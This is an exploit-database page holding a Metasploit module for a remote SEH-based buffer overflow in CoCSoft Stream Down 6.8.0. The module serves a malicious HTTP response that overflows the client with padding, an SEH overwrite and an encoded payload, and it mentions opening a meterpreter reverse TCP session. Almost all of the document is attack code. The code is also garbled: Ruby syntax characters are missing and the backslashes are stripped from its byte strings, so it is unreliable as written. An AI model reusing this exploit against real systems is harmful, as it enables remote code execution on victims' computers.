[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CoCSoft Stream Down 6.8.0 Universal exploit metasploit
# Published : 2011-12-27
# Author :
# Previous Title : HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow
# Next Title : Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability

# $Id: stream_down_BOF.rb 1 2011-12-18 $
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking
	include Msf::Exploit::Remote::HttpServer
	def initialize
					'Name'           => 'StreamDown Buffer over flow universal exploit',
					'Version'        => '$Revision: 1 $',
					'Description'    => 'Stream Down Buffer Overflow universal exploit tested against win xp sp3 and win7 sp1. Also note that the program will not crash in case of meterpreter reverse tcp payload but a session will be opened',
					'Author'         => 'Fady Mohamed Osman',
					'References'	 => 
								['URL', 'http://www.dark-masters.tk/']
					'Privileged'     => false,
					'DefaultOptions' =>
							'EXITFUNC' => 'seh',
							'InitialAutoRunScript' => 'migrate -f'
					'Payload'        =>
							'BadChars' => "x00xffx0a"
					'Platform'       => 'win',
					'Targets'        =>
							[ 'Automatic',  { } ],
					'DefaultTarget' => 0,
					'License'        => MSF_LICENSE
	def on_request_uri(cli,request)
		seh = 0x10019448
		nseh = "xebx06x90x90"
		sploit = "A"*16388 + nseh + [seh].pack('V') + "x90"*10 + payload.encoded 